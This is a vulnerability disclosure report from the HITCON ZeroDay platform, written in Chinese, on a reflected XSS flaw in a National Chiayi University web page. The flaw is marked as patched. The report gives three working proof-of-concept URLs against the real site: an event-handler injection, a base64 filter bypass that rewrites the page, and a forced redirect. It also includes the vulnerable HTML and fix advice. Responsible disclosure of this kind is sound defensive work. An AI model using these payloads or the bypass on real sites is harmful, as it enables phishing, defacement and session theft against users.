嘉義大學 XSS 漏洞 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2026-00622
  •  發信 Vendor: 國立嘉義大學
  • Title: 嘉義大學 XSS 漏洞
  • Introduction: show_Map_Class.aspx 頁面的 year 參數未經過適當編碼即反射至 HTML 屬性中,攻擊者可注入惡意事件處理器執行任意 JavaScript,對使用者造成危害。

處理狀態

目前狀態

公開
Last Update : 2026/06/06
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 未複測
  • 公開

處理歷程

  • 2026/05/02 20:57:27 : 新提交 (由 vic88 更新此狀態)
  • 2026/05/02 23:35:54 : 新提交 (由 vic88 更新此狀態)
  • 2026/05/05 00:23:49 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/05/27 15:38:59 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/05/27 15:38:59 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/05/27 15:39:00 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/05/29 11:39:21 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/06/06 03:00:18 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2026-00622
  • 通報者:vic88 (vic88)
  • 風險:中
  • 類型:反射型跨站腳本攻擊 (Reflected Cross-Site Scripting)

參考資料

攻擊者可經由該漏洞竊取使用者身份,或進行掛碼、轉址等攻擊行為。

漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

防護原則: OWASP - XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

防禦繞過方式: OWASP - XSS Filter Evasion Cheat Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://guides.ncyu.edu.tw/show_Map_Class.aspx?year=113&DeptNo=345

敘述

漏洞說明

guides.ncyu.edu.tw的 show_Map_Class.aspx 頁面中,year GET 參數的值未經過適當的 HTML 編碼處理,即直接被反射至回應頁面的 HTML
屬性值中,導致攻擊者可透過特製 URL 注入任意 HTML 事件處理器,若使用者滑過或點擊,即可觸發跨站腳本攻擊。

重現步驟

PoC 1(onmouseover 觸發 alert)

https://guides.ncyu.edu.tw/show_Map_Class.aspx?year=113%22%20onmouseover%3d%22alert(1)%22&DeptNo=345

*URL decode 後的 payload 為:year=113" onmouseover="alert(1)"
服務端將 year 的值反射進連結屬性,形成:

<a href="show_Map_Class.aspx?year=113" onmouseover="alert(1)"&DeptNo=345...">

滑鼠滑過即可觸發alert(1)
圖片
PoC 2 DOM 操作(base64 繞過過濾)
直接傳入 document.body.innerHTML 會被伺服器端重新導向首頁,
但透過 atob() 對 payload 進行 base64 編碼可繞過此限制:

https://guides.ncyu.edu.tw/show_Map_Class.aspx?year=113%22%20onmouseover%3d%22document.body.innerHTML%3datob(%27PGgxPkhhY2tlZCBieSBYU1M8L2gxPg%3D%3D%27)%3B%20return%20false%3B%22&DeptNo=345

base64 decode後的 payload 為:

<h1>Hacked by XSS</h1>

觸發後整個頁面的 body 內容會被替換。
圖片
PoC 3 跳轉至其他網域

https://guides.ncyu.edu.tw/show_Map_Class.aspx?year=113%22%20onmouseover%3d%22window.location%3d%27https%3A%2F%2Fexample.com%27%22&DeptNo=345

URL decode後的 payload 為:

year=113" onmouseover="window.location='https://example.com'"

一樣只需滑鼠經過即可觸發跳轉

相關原始碼片段

伺服器回傳的 HTML 中,year 被直接嵌入連結屬性,未經正確處理:

<a href="show_Map_Class.aspx?year=113" onmouseover="alert(1)"&DeptNo=345&SecNo=&CP_ID1=88#id88">
    精準農業科研人才
</a>

以及頁面底部按鈕:

<a href="show_Map_DeptList.aspx?year=113" onmouseover="alert(1)"&DeptNo=345&cID=&pID="">
    更多相關職業
</a>

影響

  • 攻擊者可透過社交工程散布惡意連結,誘騙使用者點擊
  • 可竊取使用者 Cookie / Session(但本站目前無發現明顯使用者登入機制,Cookie 竊取實際危害有限)
  • 可進行釣魚攻擊、頁面偽造
  • 可重新導向使用者至惡意網站

影響範圍

  • 受影響頁面:show_Map_Class.aspx,經測試 DeptNo=345、346、347等多個系所頁面均受影響,推測全站系所頁面共用相同渲染邏輯

修補建議

1. **輸出編碼(Output Encoding)**:所有來自使用者輸入的參數,在反射至 HTML 屬性時,應使用 HTML 屬性編碼。

2. **輸入驗證(Input Validation)**:`year` 欄位應於伺服器端驗證為純整數格式(如正則 `^\d{3,4}$`),若不符合則拒絕請求或回傳錯誤頁面。

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;